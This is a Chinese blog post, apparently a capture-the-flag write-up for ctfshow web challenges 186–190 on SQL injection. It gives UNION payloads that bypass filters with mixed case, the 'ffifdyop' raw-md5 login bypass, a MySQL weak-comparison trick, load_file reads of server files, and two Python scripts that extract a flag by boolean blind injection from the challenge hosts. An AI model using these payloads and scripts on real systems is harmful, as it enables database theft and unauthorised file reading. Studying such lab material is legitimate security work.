当前位置:
  1. 首页
  2. 互联网
  3. 正文
本文介绍: 是一个特殊字符串,类似万能密码。所以当usernamepassword都为0时可以成功类型比较,得到flag。因此这里我们需要找到一个转换为原始16位二进制字符串满足我们注入sql里,数字字符串匹配是弱类型比较字符串转换数字,如。我们可以发现where条件为0时返回所有数据。根据上面来看,我们可以发现匹配到的时候返回1。password根据188我们直接写0来匹配。,那么如果输入username是0,则会。在phpmyadmin里面试一下。

 186大小写绕过

1' order by 3--+

 

发现union select过滤,用大小写来绕过

1' union seleCT 1,2,database() --+

1' union seleCT 1,2,table_name from information_schema.tables where table_schema='ctfshow_web' --+

1' union seleCT 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+

1' union seleCT 1,2,password from ctfshow_web.ctfshow_user --+

 

187md5

    $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名存在';
        die(json_encode($ret));
    }

 md5()

因此这里我们需要找到一个转换为原始16位二进制字符串满足我们的注入。 

ffifdyop一个特殊字符串,类似万能密码。还有129581926211651571912466741651878684928也可以达到同样的效果

 

188弱比较

 

查询语句  

$sql = "select pass from ctfshow_user where username = {$username}";

sql里,数字字符串的匹配是弱类型比较字符串会转换数字,如0==admin,那么如果输入username是0,则会匹配所有开头不是数字或者为0的字符串和数字0。

phpmyadmin里面试一下

我们可以发现当where条件为0时返回所有数据

所以当usernamepassword都为0时可以成功类型比较,得到flag

189盲注读取文件

flagapi/index.php文件

根据提示

学习load_file读取文件   第一反应就想到了

regexp正则

本地调试一下啊

?param=-1' union select 1,2,3,4,if((load_file('D:\phpstudy_pro\WWW\aa.txt'))regexp('aa'),0,1) --+

?param=-1' union select 1,2,3,4,if((load_file('D:\phpstudy_pro\WWW\aa.txt'))regexp('ab'),0,1) --+

根据上面来看,我们可以发现匹配到的时候返回1

匹配失败返回0

password根据188我们直接写0来匹配

import requests

url = "http://655b6baa-dd5c-4780-97db-2815b916c1ad.challenge.ctf.show/api/"
payload = """if((load_file("/var/www/html/api/index.php"))regexp("{0}"),0,1)"""


flag = "ctfshow{"
for i in range(1, 100):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz-{}':
        payload1 = payload.format(flag + j)
        data = {
            'username': payload1,
            'password': 0
        }
        re = requests.post(url=url, data=data)
        # print(re.text)
        # print(payload1)
        if r"""{"code":0,"msg":"u5bc6u7801u9519u8bef","count":0,"data":[]}""" in re.text:
            flag += j
            print(flag)
            if j == "}":
                exit()
            break

190 post布尔盲注

 

import requests

url = "http://d33a9dcf-4743-46eb-b871-83de283bdf68.challenge.ctf.show/api/"
# payload = """admin' and if(ascii(substr((select database()),{0},1))>{1},1,0)-- +"""
# payload = """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0},1))>{1},1,0)-- +"""
# payload = """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{0},1))>{1},1,0)-- +"""
payload = """admin' and if(ascii(substr((select group_concat(f1ag) from ctfshow_fl0g),{0},1))>{1},1,0)-- +"""
flag = ''
for i in range(1, 100):
    for j in range(32, 128):
        payload1 = payload.format(i,j)
        data = {
            'username': payload1,
            'password': 0
        }
        response = requests.post(url=url, data=data)
        # print(payload1)
        # print(response.text)
        if r'''{"code":0,"msg":"u5bc6u7801u9519u8bef","count":0,"data":[]}''' not in response.text:
            flag += chr(j)
            print(flag)
            break

 

payload = """admin' and if(ascii(substr((select database()),{0},1))>{1},1,0)-- +"""

 

payload = """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0},1))>{1},1,0)-- +"""

payload = """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{0},1))>{1},1,0)-- +"""

         

payload = """admin' and if(ascii(substr((select group_concat(f1ag) from ctfshow_fl0g),{0},1))>{1},1,0)-- +"""

 

显示所有内容
上一篇 SVN下载使用和说明
下一篇 在AWS Lambda上部署标准FFmpeg工具——Docker方案

相关文章

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

插入图片
浏览器会保存昵称、邮箱和网站cookies信息,下次评论时使用。